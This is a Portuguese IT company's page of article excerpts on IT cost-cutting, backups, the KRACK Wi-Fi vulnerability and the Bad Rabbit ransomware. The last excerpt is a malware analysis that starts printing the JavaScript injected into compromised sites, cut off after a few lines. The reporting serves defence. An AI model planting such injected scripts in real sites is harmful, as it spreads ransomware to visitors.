Dereco Tecnologia

Seu chefe já te pediu pra fazer? Sua empresa está precisando? A crise está te obrigando a fazer mais com menos? Esse é um mantra que sempre aparece em tempos de crise, mas também é recitado por altos executivos em apresentações pomposas e recheadas de gráficos e números, em artigos, discursos e até em conversas de corredor. Mas será que é realmente possível fazer mais com menos? A primeira coisa a se entender é o que significa mais com menos em TI: mais chamados atendidos? mais performance dos servidores? mais gente com menos dinheiro? mais usuários suportados com menos hardware? mais servidores em menos espaço físico? Alguns desses exemplos são factíveis, enquanto outros não, e algumas coisas dependem do nível de maturidade da TI, vamos explorar alguns desses pontos: 1. Hardware & Softwares Primeiro é preciso entender que é difícil reduzir a quantidade de hardware existente, espaço ocupado ou energia elétrica consumida sem novos investimentos, ou seja, é necessár...

Quantas vezes teremos de bater na tecla do quão importante são os  backups ? Bem, sabemos que as pessoas acham o processo complicado e evitam torná-lo parte da rotina. Como devem ser feitos os backups? O que você deve guardar? Onde salvar esses arquivos? Muitos dispositivos, pouco tempo e é aí que o backup fica em segundo plano. Neste artigo, abordaremos os principais problemas acerca do backup na seguinte ordem: quando, onde, o que e como. Quando? A primeira questão é: quando você deve salvar seus dados? Já a resposta, é bem simples, com a maior frequência possível. É importante enfatizar que você deve o fazer regularmente. Portanto, a melhor opção é criar uma programação para realização do processo em intervalos frequentes e regulares. (Idealmente, é interessante que seja executado automaticamente, falaremos disso um pouco mais tarde.) Considere que nem todo dado tem o mesmo valor. Portanto, nem todo arquivo precisa ser salvo com a mesma frequência. Por exemplo, se você t...

A maioria das vulnerabilidades passa despercebida pela maioria da população mundial, mesmo que afetem vários milhões de pessoas. Mas esta notícia é particularmente grande: pesquisadores encontraram um monte de vulnerabilidades que tornam insegura todas as redes WiFi. Um  artigo  descreve como praticamente qualquer rede Wi-Fi que dependa da criptografia WPA ou WPA2 pode ser comprometida. E com o WPA sendo o padrão do WiFi moderno, isso significa que praticamente todas as redes wireless são vulneráveis. A pesquisa é bastante complicada, então não vamos analisá-la em detalhes e destacaremos somente as principais descobertas. Como o KRACK funciona Os pesquisadores descobriram que os dispositivos baseados em Android, iOS, Linux, MacOS, Windows e alguns outros sistemas operacionais são vulneráveis ​​a alguma variação desse ataque e isso significa que quase qualquer dispositivo pode ser comprometido. Eles chamaram esse tipo de ataque de  reinstalação de chave , ou...

Já vimos dois ataques em grande escala do Ransomware este ano –  WannaCry  e  ExPetr  (também conhecido como Petya e NotPetya). Parece que um terceiro ataque está em ascensão: o malware Bad Rabbit – nome indicado pelo site darknet citado na nota de resgate. O que se sabe até agora é que o Bad Rabbit infectou vários grandes meios de comunicação russos, como as agências de notícias Interfax e Fontanka.ru. O Aeroporto Internacional de Odessa (Ucrânia) informou sobre um ataque cibernético em seu sistema de informação. Os criminosos por trás do ataque Bad Rabbit estão exigindo 0,05 bitcoin como resgate – aproximadamente US$ 280 à taxa de câmbio atual. De acordo com nossas descobertas, o ataque não usa  exploits . É um ataque drive-by: as vítimas baixam um falso instalador do Adobe Flash de sites infectados e iniciam manualmente o arquivo . exe , infectando-se assim. Nossos pesquisadores detectaram uma série de sites comprometidos, todas de notícias ou de mídia....

Um novo surto de ransomware atacou essa semana a grandes infraestruturas na Ucrânia, incluindo o Metrô de Kiev. Assim como prometemos, realizamos uma análise mais detalhada e a seguir apresentamos os resultados desta nova variante do Diskcoder.D. Drive-by download via watering hole em sites populares Um dos métodos de distribuição do Bad Rabbit é um drive-by download. Alguns sites populares são comprometidos e neles se injeta JavaScript no HTML ou em um de seus arquivos .js. Aqui está uma versão pólida da injeção: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 function e ( d ) {    var xhr = null ;    if ( ! ! window . XMLHttpRequest ) {      xhr = new XMLHttpRequest ( ) ;    } else if ( ! ! window . ActiveXO...